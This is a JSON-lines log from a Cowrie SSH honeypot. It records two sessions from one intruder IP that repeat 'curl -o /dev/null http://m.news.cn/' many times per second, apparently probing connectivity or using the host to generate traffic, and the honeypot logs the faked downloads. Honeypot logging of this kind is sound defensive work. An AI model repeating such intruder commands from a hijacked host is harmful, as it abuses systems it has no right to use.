{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.469171Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.502391Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.503323Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.506369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.507462Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.516353Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.540586Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.541669Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.556947Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.558736Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.560286Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.563027Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.594633Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.595704Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.598209Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.599230Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.602893Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.637295Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.638361Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.640824Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.641524Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.738215Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.740312Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.742005Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.742857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.745120Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.746225Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.792275Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.793307Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.795364Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.796242Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.843341Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.844876Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.850444Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.851318Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.856294Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.857081Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.889584Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.903262Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.904180Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.913853Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.914714Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.936270Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.938211Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.960486Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.961516Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.984646Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.985512Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.023865Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.024824Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.040499Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.046421Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.047264Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.054130Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.077150Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.078195Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.081092Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.084294Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.087498Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.097619Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.098701Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.116987Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.118253Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.169444Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.170729Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.177236Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.178145Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.201499Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.217687Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.218746Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.225155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.226074Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.248443Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.249947Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.260087Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.261115Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.270867Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.272067Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.287275Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.305480Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.306925Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.314229Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.315184Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.327669Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.342357Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.343134Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.355408Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.356410Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.374590Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.378924Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.379979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.393462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.394537Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.415659Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.416836Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.427823Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.440156Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.441110Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.452341Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.468502Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.469672Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.495400Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.497071Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.498097Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.520371Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.521176Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.546938Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.547930Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.565227Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.566190Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.591134Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.597617Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.598613Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.612152Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.613645Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.618351Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.620188Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.643064Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.644061Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.662006Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.663198Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.672956Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
